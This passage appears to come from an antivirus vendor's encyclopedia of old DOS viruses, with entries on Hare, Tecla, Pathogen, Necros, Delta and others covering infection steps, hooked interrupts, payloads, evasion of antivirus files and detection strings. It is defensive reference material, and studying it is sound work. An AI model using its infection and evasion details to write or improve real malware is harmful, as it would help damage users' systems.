File Virus Virus Length: Virus Infect Type: COM and EXE files and Master Boot Record Place of Origin: Virus Memory Type: High Memory PC Vectors Hooked: Int 21h Infection Procedure: 1) NOTs the data in CS:[DI] or 115C:2822 with a CX value of ED5h. Then another encryption starting at 115C:29B2 with a CX value of E0Eh, 2) XORs AX with an initial value of 2726. 3) Increments AH and AL by 2h. 4) Gets the memory size service with a return value of AX=280h. 5) Gets the dos variable and loads it to the high memory from 115C:2810 to 9DDE:0 with a size of 1DBAh. A message can be found there which reads: "HDEuthanasia by Demon Emperor: Hare Krsua, hare, hare" 6) Hooks Int 21h and sets it. From there it infects the master boot record. [Hare.7750] Virus Type: File Virus Virus Length: Virus Infect Type: COM and EXE files and Master Boot Record Place of Origin: Virus Memory Type: High Memory PC Vectors Hooked: Int 21h Infection Procedure: 1) Encrypts data, address 115C:[2824], 3866 times by using the NOT operand. Another loop in 115C:[29B2], 3667 times by XORing to AX. AH and AL are incremented by 2h, thus producing: "INFECTUM.COM.HOSTA.COMCOM.COMMAND\SYSTEM\IOSUBSYS\HSFLOP.PDR" 2) Gets the memory size, 640 bytes. 3) Gets the dos variable. 4) Loads the code to the high memory, from 115C:2810 to 9DD5:0000 (7750 bytes). 5) Returns the disk drive parameters to read the hard disk. Reads disk sectors, 1 sector to be transferred to address 9DD5:2096, track no. 108, sector no. 1, head no. 125. 6) Executes the following codes: XOR AL,AL OUT 43,AL JMP 94C IN AL,40 MOV AH,AL IN AL,40 XOR AL,AH XCHG AL,AH The virus first infects the MBR, from there it waits for COM and EXE files to infect. Damage: When rebooting, the computer reboots repeatedly. [Markt] Virus Type: File Virus, Soft Mice Other Name: WERBE Virus Length: 1533 bytes Original Name: WERBE Place of Origin: Germany PC Vectors Hooked: Infection Procedure: 1) Decrypts 1412 bytes of its virus code. 2) Gets the DTA address and then sets it. 3) Checks the current drive and then overwrites the boot sector of the hard disk. Damage: Upon loading the virus it overwrites all the boot sectors of all fixed drives, thus destroying them. This message can be found in the virus code: "Ups, all Disks from" "C: to Z: Trashed!" "Sorry about that!" "to all Military Inventors its time to give us the Tachyonator!" "MediaMarkt WerbeVirus '94 (c)" "MediaMarkt Germany The Wizard" Note: After destroying the hard disk the virus executes the following code: 17AC:0575 JMP 0575 This code performs an endless loop. [Leon.1217] Virus Type: Polymorphic, File Virus (EXE files) Virus Length: 1,224-1,253 bytes Virus Memory Type: Non-memory resident Place of Origin: PC Vectors Hooked: INT 24h Infection Procedure: The virus only infects .EXE files. It increases an infected file's size by 1,224-1,253 bytes. The virus infects the host file by attaching itself at the end of the file. As a polymorphic virus, it first decrypts its program using XOR 1410H to each encrypted word. Then it hooks INT 24H to disable the disk write error display when it is infecting its host file. Then it checks the current disk directory and searches for EXE files. After finding a file it changes its attribute to archive. Then it checks for the current time. If it is between the 7th-60th minute of an hour, and between the 30th-60th second of a minute, the virus closes the file and does not infect. Any time beyond that, the virus infects every EXE file in all the subdirectories of the current drive. The virus is not memory resident. It only activates upon loading and executing an infected file. It will be obvious when the virus infects .EXE files in the current drive for it takes a long time, depending on the number of .EXE files in the current drive, to load a file. Damage: It slows down the loading of executable files. Symptom: 1) Infected files increase by 1,224-1,253 bytes. 2) Very slow loading of executable files. [Karnavali.1972] Virus Type: File Virus Other Name: Virus Length: Place of Origin: PC Vectors Hooked: Infection Procedure: 1) Gets the dos variables. 2) Reads drive C:. Reads FFFFh sectors, with starting sector 5945h and 139E:0889h memory address for data transfer. 3) Tries to write 4 sectors to drive C:. After writing, EXE and COM files that are executed will not get infected. After rebooting the system, the system will hang and the keyboard will be disabled. [Tecla] Virus Name: BARR1303 Virus Type: Polymorphic, File Virus Other Name: TECLA Virus Length: 2051 bytes Virus Infect Type: COM and EXE files Trigger Condition: September 23 Virus Re-infect: No Virus Memory Type: High Memory Resident Place of Origin: PC Vectors Hooked: INT 16h, INT 21h, INT 24h Infection Procedure: The virus is a polymorphic type and infects both .COM and .EXE files. It adds 1303 bytes to an infected file. It first decrypts its code, which is attached to the host, using SUB 75H to each byte. It can be seen from the decrypted data area of the virus code string "SSta Tecla(MAD1)" which gives another name to the virus. It copies its program (1033 bytes) to the high memory, 9F9A:0100; thus, overlaps the video adapter memory. Once resident in the memory it checks if the date is September 23. If it is, it activates its payload by hooking to INT 16H (change to vector 9F9A:017C) and changes the keyboard ASCII table. It increments all the unextended keyboard input by 1 ASCII character. Thus, a keyboard input of "A" will display "B", or an input of "." will display "/", and so on. Without the trigger date it still hooks to INT 21h by changing its vector to its program in the high memory 9F9A:016C to infect every loading and executing program. It also hooks to INT 24h and changes its vector to 9F9A:0107 which is seen to give no payload. Damage: Changes unextended keyboard input to an increment of 1 ASCII character. [Barrotes.1310.A] Virus Name: BARR1310 Virus Type: File Virus Other Name: Virus Length: 1310 bytes Virus Infect Type: .COM and .EXE files Trigger Condition: January 5 Virus Re-infect: No Virus Memory Type: High Memory Resident Place of Origin: PC Vectors Hooked: INT 1Ch, INT 21h Infection Procedure: The virus is a file type virus that infects both .COM and .EXE files. It adds 1303 bytes to an infected file. It copies its program to the high memory at 9F9C:0100; thus, overlapping with the video adapter memory. It hooks to INT 21H by changing its vector to point to its program at 9F9C:017B. This will allow the virus to infect loading and executing files. Once it becomes resident in the memory it checks the date. If it is January 5, it will change the interrupt vector of INT 1CH to point to its program in the high memory at 9F9C:049F. Then it overwrites the MBR of drive C; thus, destroying its partition. Since INT 1CH is a clock tick interrupt, the program it is pointing to is executed 18.2 times per second. The program at this interrupt displays: "Virus BARROTES pro OSoft" on a blue background, and four vertical, flickering bars across the screen. At this point, the machine can still be used if the user can tolerate the eye straining bars. Damage: 1) Destroys drive C's MBR and partition table. 2) Corrupts the video display. [Cascade] Virus Name: CAS1701A Virus Type: Polymorphic, File Virus Other Name: Variant: CASCADE.1704 Virus Length: 1,701 bytes Virus Infect Type: .COM files Virus Re-infect: no Virus Memory Type: Memory resident, MCB type Place of Origin: PC Vectors Hooked: INT 21h Infection Procedure: The virus only infects .COM files. It increases an infected file's size by 1,701 bytes. The virus infects the host file by attaching itself at the end of the file. It is memory resident and can be activated upon loading and executing an infected .COM file. As a polymorphic virus, it first decrypts its code. Then the virus copies its 1701 bytes program in the low memory, after the DOS resident programs. Then it hooks to INT 21H by changing its vector to point to its program at 17F8:031C. It uses the interrupt's service 4BH to attach itself to the host file. After attaching itself to the host, it encrypts its main program and writes the new file to the disk. It was seen that the virus checks the current year before it infects the host file, and the trigger year is 1988. Matching this year, which will not happen unless there's something wrong with the system clock, there is no payload seen. The virus occupies 1,984 bytes in the memory when checked using DOS CHKDSK. Symptom: 1) Infected files increase by 1,701 bytes. 2) Decreases the memory by 1,984 bytes. [Natas-1] Alias: Never-1 Origin: Eff Length: 1788 bytes Virus Type: File Virus; Encryption Virus; .COM files only Symptoms : Infected files increase by 4744 bytes, decrease in available memory by 6144 bytes. Program execution slows down. General Comments: The virus first decrypts 2300 bytes of its code and then allocates 6144 bytes into the High Memory Area. It will then copy a part of its code to the area where INT 1 Vector is pointing to thus replacing it. Then it will move 5111 bytes to the High Memory Area. It will then hook INT 10, 13, 15 and 21. Further analysis of the virus was not possible because it has replaced the code for INT 1 which is the Single Step Interrupt which is used by debuggers like DEBUG and S-ICE. NATA4744 will format a track on the hard disk every time INT 1 is used, and it will continue to do so until all local fixed drives are formatted. This message is found in the virus code: "Time has come to pay (c) 1994 NEVER-1" [S_Bug.A] Virus Type: Polymorphic Virus Eff Length: 3500-5500 bytes Virus Status: Symptoms : Increase in the size of infected COM and EXE files by 3500-5500 bytes and decrease in available memory by 10272 bytes. Executing programs may slow down due to the infection procedure of the virus. General Comments: This virus is a very complex and highly polymorphic virus. It will first decrypt 3504 bytes of its virus code and then allocate 10 kbytes of memory. It will then be resident in the High Memory Area. It will also hook INT 21h with infection triggers with services 3D, 4B and 6C. Files infected by the virus are more likely to have file sizes as this virus randomly assigns codes for decryption of the real virus code which is 3504 bytes. File sizes may be from 3500 bytes to 5500 bytes. All COM and EXE files that are opened, executed or copied will be infected if the following condition is satisfied COMSPEC=COMMAND.COM. This condition is also the trigger of the virus if it is resident or not. This message is found in the virus code: "Satan Bug Virus - Little Loc" [Smeg.Pathogen] Alias: SMEG v0.1 Origin : United Kingdom Eff Length : 4432-4447 bytes Virus Type: Symptoms : Increase in file size of EXE and COM programs with a size of 4432-4447 bytes and decrease of 7872 in available memory. General Comments: On the first infection, this virus will first allocate 7872 bytes in the High Memory Area and then transfer 3700 bytes of its code to that area. It will then hook INT 21, INT 13, INT 20 and will make INT 3 as INT 21. Pathogen is very complex and it is a polymorphic type of virus. This virus will infect COM and EXE files that are opened, executed and copied. It will also display a "Memory allocation Error" when an infected file attempts to be memory resident. The danger Pathogen brings is that when the system date is Monday and the time is 5:00 - 5:59 PM it writes zeroes onto the sectors of the hard disk randomly, thus destroying some, if not all, of the data in the drive. It will also trash or reset the BIOS of the computer. The virus displays the following messages on the screen: "Your hard-disk is being corrupted, courtesy of PATHOGEN!" "Programmed in the U.K. (Yes, NOT Bulgaria) (c) The Black Baron 1993-4" "Featuring SMEG v0.1 : Simulated Metamorphic Encryption Generator" " 'Smoke me a kipper, I'll be back for breakfast.....!" "Unfortunately some of your data won`t!!!!!" [Cawber] Virus Type: Polymorphic Virus Length: 2010 bytes Virus Memory Type: Non-memory resident Place of Origin: PC Vectors Hooked: Infection Procedure: The virus is a polymorphic type that first decrypts its decryptor using 63 bytes of data in its viral code. Each byte, as stored in the AX register, is decrypted using SHL AX,1 and is added to the BP register. The final result stored in BP after 63 decryptions will be the decryptor. The virus then decrypts its 2,010 bytes code using XOR AX, BP, where AX contains a word of the encrypted virus code. How it allocates memory to make itself memory resident was not seen and its hook to any interrupts. There is also no infection trigger. [Sayha] Virus Type: File Virus Virus Length: Virus Re-infect: Does not reinfect Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21h Infection Procedure: 1) Loads itself to high memory, loading approximately 9040 bytes. 2) Infects *.COM and *.EXE files by attaching itself to the host program. 3) Moves the virus code by batches, copying its code 2 bytes at a time in different locations. Damage: 1) Increases file size. 2) Occupies space in HMA. Symptom: Delay in program execution. [SCITZO] Virus Type: File Virus Virus Length: Approximately 1329 bytes Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21h Infection Procedure: 1) Loads itself to high memory, allocating 1360 bytes (using MEM). 2) Moves 1329 (0531H) bytes to high memory. 3) Infects *.COM and *.EXE files. Copies the virus code to the host program, adding approximately 1329 bytes. Loads the virus first before running the host program. The virus when resident in memory, will infect any executed *.COM and *.EXE files. It does not do anything special. It just replicates when it is memory resident. Infects only executed files. Damage: 1) Free memory decreases. 2) Infected files increase in length. 3) Adds approximately 1329 bytes. Symptom: Delay in program execution due to virus activity. Detection method: Locate the virus text strings. [Necros] Origin: Tralee, Co. Kerry, Ireland Eff Length: 1164 bytes Virus Type: File Virus; Encryption Virus; .COM files Symptoms : It will increase com files by 1164 bytes, decrease in available memory by 2624 bytes. Execution of running programs slows down. A write-protect error appears when a program is opened and the disk is write protected. General Comments: This virus will first decrypt its code with a size of 1142 bytes and then will hook INT 3, INT 21 and INT 1C. Then it will allocate 2624 bytes in the memory. This virus will be MCB resident after executing the carrier program because it will execute a TSR command. It will immediately infect .COM files that are executed. When .EXE files are run, Necros will create a hidden .COM file of the same name and will increase the file size to 1164 bytes. The Necros virus will check if the system date is November 21. If this condition is satisfied then it will start to produce a countdown- like sound 2 minutes after the virus has been loaded. This will go on for 15 seconds before this message is displayed on the screen: "Virus V2.0 (c) 1991 Necros the Hacker." "Written on 29,30 June in Tralee, Co. Kerry, Ireland" "Happy Birthday, Necros!" [Helloween.1376] Virus Type: File Virus Other Name: Virus Length: Virus Infect Type: EXE and COM files Trigger Condition: November 1 Place of Origin: Virus Memory Type: High Memory Type PC Vectors Hooked: Int 21h Infection Procedure: 1) Loads itself into the high memory immediately copying from address 1155:0129h to 9F89:0000h, copying 1376 bytes. 2) Hooks INT 21h. 3) Gets the Real-Time Clock date, and returned values are in BCD. 4) Checks whether the date is November 1. If yes, it clears the screen, background color is red and this message appears in the middle of the screen: "Nesedte porad u pocitace a zkuste jednou delat neco rozumneho!" "**************" "!! Poslouchjte HELLOWEEN - nejlepsi metalovou skupinu !!" Then by pressing any key, the machine will reboot. Making no infection. But if the date is not November 1, the COM and/or EXE files that are executed will get infected. Detection method : Infected files increase up to 1376 bytes. [Delta.1163] Virus Type: Polymorphic, File Virus Other Name: Virus Length: 1163 bytes Original Name: DELTA Virus Infect Type: .COM and .EXE files Trigger Condition: November 4 Virus Re-infect: no Discovery Date: February 1996 Virus Memory Type: High memory resident Place of Origin: Brazil PC Vectors Hooked: INT 21H Infection Procedure: As a polymorphic virus it first decrypts its main program using XOR C0H to each byte. It infects its host by attaching itself at the end of the file. It adds 1,163 bytes to an infected file. Then it copies its program in the high memory at 9F69:0000 and jumps there. It hooks INT 21H by pointing its vectors to 9F69:01C5. The virus can become memory resident upon loading and executing an infected file. Being memory resident it can attach itself to an executable file when the file uses service 4BH of the hooked INT 21H. During infection the virus checks if the current month is November and the current day is 4. At this time the virus resets the drive C:\ BIOS configuration and changes the boot sequence to search drive C:\ first upon bootup. Then waits for 30 sec. before making a warm boot. The following messages appear: "Good bytes from (DEL)ta Virus!!!" " Reset in 30 seconds. " After which, the hard disk will be disabled, as if it already has a corrupted partition table. Upon infecting an executable file it makes its second infection to COMMAND.COM in drive A:\; thus, corrupting it and disabling proper bootup. The effect of the payload can be easily solved by reconfiguring the hard disk in the BIOS and replacing the infected COMMAND.COM with a new one since the virus doesn't write to the MBR. Other text strings can be seen inside the virus code beside the one displayed upon execution of the payload which is: "Brazil - 02/96" Damage: 1) Resets the hard disk BIOS configuration. 2) Corrupts COMMAND.COM. Symptom: Infected files increase by 1163 bytes. [Delwin.1759] Virus Type: Polymorphic, Boot/File Virus Virus Length: 2048 bytes Virus Infect Type: .COM and .EXE files Virus Re-infect: no Discovery Date: Virus Memory Type: High memory resident Place of Origin: PC Vectors Hooked: INT 13h, INT 21h, INT 1Ch Infection Procedure: Infecting the Master Boot Sector: The virus primarily infects the Master Boot Sector of drive C:\. As a polymorphic virus it first decrypts 1,714 bytes of its code using XOR 9B. Then it reads the boot sector of drive C:\ in its program. It saves a copy of this sector to head 0, cylinder 0, sector 2 of drive C:\. Then in makes a byte output twice to port 70H whose purpose is unknown due to the unavailability of hardware port reference. The virus makes a copy of its program, occupying 4 sectors, to head 0, cylinder 0, sector 3 of drive C:\. Then the virus modifies the first 46 bytes of the boot sector copied in its program and writes it back to the boot sector of drive C:\ Infecting Executable Files: Once the virus has infected the boot sector of drive C:\ it becomes memory resident upon system bootup. Upon bootup it first allocates space in the high memory starting at 9E70:0000. Then it reads its program, which occupies 4 sectors, from the infected drive C:\ starting from sector 3, cylinder 0, head 0 to its allocated space in the high memory (9E70:0100). From there it hooks to INT 13H and INT 21H to point to its program in the high memory which will enable the virus to attach itself to any loading and executing .COM or .EXE file. Then after hooking to the interrupts it retrieves the original boot sector from head 0, cylinder 0, sector 2 of drive C:\ to resume normal bootup. At this point the virus is already memory resident and can infect executable files when loaded, executed and copied. It first searches for COMMAND.COM to infect. The virus infects the file by attaching itself at the end of the host file. However, its attachment most of the time is not complete and sometimes just corrupts the program so the size added to the infected file is not definite. No trigger or payload exists. Damage: Corrupts executable files. Symptom: Slows down file loading and execution time. [Lemming.2160] Virus Type: File Virus Place of Origin: Virus Memory Type: Non resident type PC Vectors Hooked: Int 21 Infection Procedure: 1) Encrypts data from 114C:[SI+BP],XOR to 49h producing a message that reads: "TBDRV SP" "The Rise and Fall of ThunderByte-1994-Australia" "You will Never Trust Anti-Virus Software Again!!" "[LEMMING] ver .99" "TBAVTBSCANNAVVSAFEFPROT" "COMcomEXEexe" 2) Gets the dos variable and points to "[LEMMING] ver .99." While the virus is memory resident, a write-protect error will appear if the user tries to execute an EXE or COM file with a write-protected disk. [Wulf.1500-1] Other Name: Wulf Virus Type: File Virus Virus Length: Approximately 1500 bytes Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 13h, Int 21h Infection Procedure: 1) Loads itself to high memory after decryption, allocating 2976 bytes (9F46:0000). 2) Moves 1500 (05CCH + 0010H) bytes onto the high memory. 3) Infects *.EXE files. Copies the virus code to the host program, adding approximately 1500 bytes. Loads the virus first before running the host program. 4) While memory resident, the virus infects all executed EXE files. The virus reacts ordinarily by allocating space in the memory before infecting files. Nothing extraordinary happens. It just attaches its code to the host program after it is loaded from the memory. Damage: 1) Decrease in free memory. 2) Increase in file size. Symptom: May display "TBMEMXXXTBCHKXXXTBDSKXXXTBFILXXXPSQRW" "[WULF] (c) 1995-96 Werewolf" "CLEAN.AVP.TB.V.SCAN.NAV.IBM.FINDV.GUARD.FV.CHKDSK" which appears in the virus code. Detection method: Decrypt the virus code, then look for the above strings. [Teraz.2717] Virus Type: File Virus Virus Length: Approximately 2717 bytes Virus Re-infect: Does not re-infect, infected file size is consistent Virus Memory Type: Non Resident Place of Origin: PC Vectors Hooked: Int 21h Infection Procedure: Directly infects *.COM and *.EXE files. Copies the virus code to the host program, adding approximately 2717 bytes. Loads first the virus before running the host program. The virus, when executed, infects any executed *.COM and *.EXE files. It does not do anything special. It just replicates when it is resident in the memory. Only infects executed files. Damage: 1) Increase in file size. 2) Adds approximately 2717 bytes. Symptom: Delay in program execution due to virus activity. [N-Xeram] Other Name: Xeram Virus Type: File Virus Virus Length: Approximately 1667-1678 bytes Virus Re-infect: Does not re-infect, infected file size is consistent. If the file is already corrupted it skips and looks for another EXE file. Virus Memory Type: Non Resident, Direct Infector Trigger Condition: Checks for system date. If the day is the 13th of any month, it will name itself N-XERAM. Otherwise, it will name itself plainly as XERAM. PC Vectors hooked: Int 21h Infection Procedure: Directly infects *.EXE files when an infected file is executed. Copies the virus code to the host program, adding approximately 648 bytes. Loads first the virus before running the host program. Special note: The virus initially searches for *.COM files. It picks COMMAND.COM first, and infects it. After infecting COMMAND.COM, the virus searches for *.EXE files. It does not search for *.COM files again. It only searches for *.EXE. The virus first gets the system date to compare the day (to establish the name), then sets DTA. The virus then searches for *.EXE files within the directory using Int 21 (4E). When the search is successful, the virus gets the file's attribute using Int 21 (43). It changes its attribute to enable the write function, (especially for the COMMAND.COM). It takes note of the file time and date using Int 21 (51) so that when it accomplishes its task of altering the code, it can save it using the original file time and date. This therefore deceives the user that the file was never been changed. After the alteration, the virus then protects itself from the following anti-virus programs, by deleting it using Int 21 (41): 1. /NCDTREE/NAV_._NO 2. /CHKLIST.MS 3. /SCANVAL.VAL These files are virus information or data files used by the respective anti-virus programs. We can classify this virus as an anti-anti-virus virus. *Every time an infected file is executed, one EXE file is infected within the same directory. Damage: 1) Increase in file size, adds approximately 1667-1678 bytes. 2) Corrupts COMMAND.COM, making it unusable. Adds 1674 bytes. Infected EXE files run normally. Symptom: Delay in program execution due to virus activity. [Despro11] Virus Type: Polymorphic, File Virus Virus Length: 2,406-2,409 bytes Virus Infect Type: .COM and .EXE files Virus Re-infect: no Virus Memory Type: High memory resident Place of Origin: PC Vectors Hooked: INT 21h, INT 24h Infection Procedure: The virus infects .COM and .EXE files. It increases an infected file's size by 2,406 bytes for .COM file and 2,409 for .EXE files. The virus infects the host file by attaching itself at the end of the file. The virus can become memory resident upon loading and executing an infected .COM or .EXE file. As a polymorphic virus, it first decrypts its code, then the virus allocates space in the high memory starting at 9E80:0000. Then it copies its code there to stay resident. Once resident it hooks to INT 21H by pointing its vector to its program in the high memory at 9E80:01BC. The virus uses this interrupt to be able to attach itself to the loading and executing files using service 4BH of the interrupt. During infection it will first hook to INT 24H (Critical Error Handler) to disable the error display during a host file write error, thus, the infection will not be obvious. Then it will search for COMMAND.COM in the root directory of the current drive and infect it if it is still not infected. Thus, after the next bootup in the same drive, the virus will immediately become resident, infecting the executable files that will be loaded in the memory. Then finally, it will infect the current file that has been loaded in the memory. The virus sometimes cannot attach itself completely to its host file, and thus, just corrupting it. There is no payload or trigger. Damage: Corrupts COMMAND.COM and executable files which can cause the system to hang. Symptom: Increases the host's file size by 2,409 bytes for .COM file and 2,406 bytes for .EXE file. [Neuroquila] Alias: Place of Origin: Eff Length: 4622 bytes Virus Type: File Virus, Encryption Virus General Comments: The NEUROQUI virus will decrypt a part of its code at the beginning of its execution and will decrypt 4622 bytes. Then it will copy this to the OS area 0000:7C00. Then it will hook INT 1. [Keypress-6] Virus Type : File Virus Other Name : Virus Length : Place of Origin : Virus Memory Type : High Memory Type PC Vectors Hooked : Int 21h, Int 1Ch Infection Procedure: 1) Saves the values of all the registers. 2) Loads itself to the high memory, 9FA3:100 loading 1216 bytes. 3) Hooks Int 21h and Int 1Ch (Timer Tick Interrupt), sets a value, then returns the original values to the registers. [Screaming_Fist] Other Name: SFIST696 Virus Type: File Virus Virus Length: Approximately 675 bytes (moves 696 bytes to memory) Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21h Infection Procedure: 1) Loads itself to high memory, loading approximately 2,048 (9F80:0000) bytes. 2) Infects *.COM and *.EXE files. Copies the virus code to the host program, adding approximately 696 (02B8H) bytes. Loads first the virus before running the host program. 3) While in the memory, the virus infects all executed COM and EXE files. The virus code is decrypted. The virus reacts ordinarily by allocating space in the memory before infecting files. Nothing extraordinary happens. It just attaches its code to the host program after it is loaded from the memory. Symptom: 1) Decrease in free memory. 2) Increase in file size. 3) May display: "Screaming Fist IIV" which appears in the decrypted code. Actual recognizable string: "C:\COMMAND>COM.Screaming Fist IIV" Detection method: Decrypt the virus code before detection. Check for the above strings. [PH33R.1332-1] Alias: Origin : Eff Length : 1332 bytes Symptoms : Increase in file size of EXE, COM, and DLL programs with a size of 1332 bytes and decrease of 2672 in available memory. When in a write-protected floppy, it usually displays a "Write Protect Error" message when there is an attempt to read from it. General Comments: On the first infection, this virus will first allocate 2672 bytes in the High Memory Area and then transfer 1332 bytes of its code to that area. It will then hook INT 21 with infection procedures to services 4B(Execute Program), 6C(Extended Open Create), 56(Rename File), and 43(Get File Attributes). This virus will infect all EXE, COM, DLL files that are opened, renamed, or executed. It will also avoid files that ends with the string "AV" (NAV, TBAV), "AN" (PCSCAN, SCAN) and "DV". The virus is named as such because of the string "PH33R" found in the virus code. [Changsha] Virus Type: Parasitic, File Virus Virus Length: 3,072-3,091 bytes Virus Infect Type: .COM and .EXE files Trigger Condition: Sunday Virus Re-infect: no Discovery Date: 1991 Virus Memory Type: Memory resident, MCB type Place of Origin: Changsha China PC Vectors Hooked: INT 8h, INT 13h, INT 21h Infection Procedure: The virus infects both .COM and .EXE files. It increases the infected file's size by 3,072 for .COM and 3,091 for .EXE. It infects its host by attaching itself at the end of the file. The virus allocates its memory resident code in the low memory after the DOS resident programs. The virus code will become memory resident upon loading, executing, and copying an infected file. While resident in the memory it can infect executable files by doing the same. It hooks INT 21H by pointing its vector to its program in the low memory at 17F8:01C0. A hook to this interrupt will enable the virus to attach itself to the host. It also hooks INT 8H (changed to 17F8:02E1) and INT 13H (changed to 17F8:0BED) but the payload is not seen. In its hook to INT 21H it gets the current date and if the current day is Sunday, it will load itself and infect all the executable files in the current directory. It will be noticed that the date and time attributes of infected files at this day will be set to 1-1-94 and 1:15a. The infected files at this day will also be corrupted and will not run properly. Other than Sunday the virus will just replicate itself to the file. If checked from DOS CHKDSK.EXE the memory occupied by the virus is 3,344 bytes. The following text strings can be seen inside the virus code: "Auto-Copy Deluxe R3.00" "(C) Copyright 1991. Mr YaQi. Changsha China" "No one can Beyond me!" Damage: Corrupts COM and EXE files. Symptom: 1) Increases the host's file size by 3,072-3,091 bytes. 2) Sets the time and date attributes to 1-1-94, 1:15a. [Chao.1241] Virus Type: Parasitic, File Virus Virus Length: 1,241-1,247 bytes Original Name: CHAOS Virus Infect Type: .COM and .EXE files Virus Re-infect: no Virus Memory Type: Memory resident, MCB type Place of Origin: PC Vectors Hooked: INT 21h, INT 13h, INT 24h Infection Procedure: The virus infects both .COM and .EXE files. It can become memory resident upon loading and executing an infected file. It increases the size of an infected file by 1,241 bytes for .COM file and 1,247 bytes for .EXE file. Upon activation the virus stays resident in the low memory, after the DOS resident programs. It hooks INT 21H by pointing its vector to its program in the low memory at 1808:020E to enable it to attach to executing files using the 4BH service of the interrupt. It also hooks INT 24H (Critical Error Handler) to disable the error message display during a host file write error. After the virus has loaded itself in the memory it first checks the current date. If it is September 13 the payload will be executed. The following trigger dates were also seen: Every 9th day of 1997 " 10th " " 1998 " 11th " " 1999 .... and so on The following formula describes how to determine the trigger day for the current year: Trigger Day = (Current Year - 1988) The payload executed by the virus during the date of trigger just hangs the system after infecting the loading and executing file. It then clears the screen and displays: "I see, I come, I conquer...Trojan horse - CHAOS v2.0 by Faust". The virus occupies 1,840 bytes of the memory as checked using DOS CHKDSK. Damage: Hangs the system. Symptom: Infected files increase by 1,241 for .COM and 1,247 for .EXE. [Chill] Virus Type: Polymorphic, File Virus Virus Length: 544 bytes Virus Infect Type: .COM files Virus Re-infect: no Virus Memory Type: High memory resident Place of Origin: PC Vectors Hooked: INT 21h Infection Procedure: The virus only infects .COM files. It increases an infected file's size by 544 bytes. The virus infects the host file by attaching itself at the end of the file. As a polymorphic virus, it first decrypts its 544 bytes code using XOR 6AH to each byte. Then the virus allocates 1200 bytes in the high memory (9FB4:0000) and copies its code there to stay resident. Then it hooks INT 21H by changing its vector to point to its program in the high memory (9FB4:00B9). The virus will become memory resident upon loading and execution of an infected file. Once it has become resident it will infect other .COM files when it is loaded and executed because it uses the altered service 4BH of INT 21H which first attaches the virus code into the host file before giving control to the host. It also sets the date attribute of the infected file to 01-01-94. Damage: None Symptom: Increases the host's file size by 544 bytes. [Three_Tunes] Virus Type: Virus Length: Approximately 1784 bytes Virus Re-infect: Does not re-infect, infected file size is consistent Virus Memory Type: High Memory Place of Origin: PC Vectors Hooked: Int 21h, Int 1Ch Infection Procedure: 1) Loads itself to high memory, allocating 2304 bytes (9F70:0000). 2) Infects *.EXE files. Copies the virus code to the host program, adding approximately 1784 bytes. Loads first the virus before running the host program. While memory resident, the virus infects any executed *.EXE files. It does not do anything special. It just replicates when it is resident in the memory. Only infects executed files. Damage: 1) Free memory decreases by approximately 2304 bytes. 2) Increase in file size. Adds approximately 1784 bytes. Note: The virus checks first if the current month is June using Int 21 (2A). If it is, it triggers the virus code; otherwise, it just exits the program. Then, the virus checks for the system time using Int 21 (2C). It uses a special formula that is used to select which payload to execute. There are 4 possible payloads which will be discussed later. But first, the formula: Int 21 (2C): Significant register CX, Adds CH to CL and returns the sum to CL (Add CL,CH) uses the AND boolean between CL,03 (And CL,03) clears CH to 00 (XOR CH,CH) compares Cl to 4 possibilities (CMP CL,+03) The virus uses this procedure to get 00, 01, 02, 03 as values for CL. Each value corresponds to a certain tune. (03 doesn't have a tune to play) When the infected file is run, a specific tune depending on the time and the result after manipulating the time is played. A total of three tunes are played. Whatever tune is played, infection remains the same, even if it plays nothing. Symptom: 1) Delay in program execution due to virus activity. 2) Plays various tunes. [Phx.965] Alias: Origin: Eff Length: 965-968 bytes Virus Type: Symptoms: Infected EXE and COM files increase by 965-968 bytes and there is a decrease of 1024 in the available memory. When in a write-protected floppy, it usually displays a "Write Protect Error" message when an attempt to read it is made. General Comments: On the first infection, this virus will first allocate 1024 bytes in the High Memory Area and then transfer 965 bytes of its code to that area. It will then hook INT 21 with infection procedures to services 4B00(Execute Program), 3D02(Open File Handle), and 40(Write to File/Device). This virus will infect all EXE and COM files that are opened, renamed, or executed. The virus is named as such because of the string "PHX" on the virus code. [HI.460] Virus Type: File Virus Other Name: Virus Length: Virus Infect Type: EXE files Place of Origin: Virus Memory Type: High Memory Type PC Vectors Hooked: Int 21h Infection Procedure: 1) Checks if the value stored in DS:[0164] is 2ED3h (if 2ED3h is not moved to that address). 2) Loads itself in the high memory in address 9FC0:0h. 3) Hooks interrupt 21h, then sets it. Once in the memory, the virus waits for an EXE file to be executed to infect it. A word "Hi" can be found in the virus code for every infected EXE file. [Liberty.2857.A] Virus Type: File Virus Other Name: Virus Length: Place of Origin: Virus Memory Type: High Memory type PC Vectors Hooked: Int 21h Infection Procedure: 1) Loads itself from 11B0:0110 to 9DEE:0110h, with 2858 bytes. 2) Encrypts the data from 11B0:[0115] with CX value = 3Ch. In this, "LIBERTY" can be found but after encrypting it the data in that address will become "Me BC.". 3) Encrypts the message again from 11B0:0113h to 114C:0100h and produces: "- M Y S T I C - COPYRIGHT (c) 1989-2000, by SsAsMsUsEsL" 4) After it is loaded in the high memory, it waits for an EXE or COM file to be executed to infect it. [Sibylle.853] Virus Type: File Virus Virus Length: Approximately 867 bytes Virus Memory Type: High Memory Place of Origin: Trigger Condition: Activates only if the millionth of a second is less than 32. If not, then it just exits the code without loading itself to the memory. PC Vectors Hooked: Int 21h, Int 2Fh Infection Procedure: 1) Loads itself to high memory, allocating 928 bytes (using MEM). 2) Moves 904 (01C4H x 2) bytes to high memory. 3) Infects *.EXE files. Copies the virus code to the host program, adding approximately 867 bytes. Loads first the virus before running the host program. While memory resident, the virus infects any executed *.EXE files. It does not do anything special. It just replicates when it is resident in the memory. Only infects executed files. Damage: 1) Free memory decreases by approximately 928 bytes. Using MEM.EXE, 928 bytes will be used by MSDOS (tricky). 2) Increase in file size. Adds approximately 867 bytes. Symptom: Delay in program execution due to virus activity. Detection method: Locate the virus text strings. [Fich-1] Virus Type: File Virus Other Name: Virus Length: Virus Infect Type: COM files (including COMMAND.COM) Place of Origin: Virus Memory Type: MCB Type PC Vectors Hooked: Int 21h Infection Procedure: The virus is a TSR program. After the virus is executed it immediately infects COMMAND.COM. Then it waits for another file to be executed to infect it. This virus only infects COM files. When one uninfected file is executed another COM file gets infected. Also, the virus doesn't re-infect files. Before the virus loads itself to the memory, it checks first whether the virus is already memory resident. 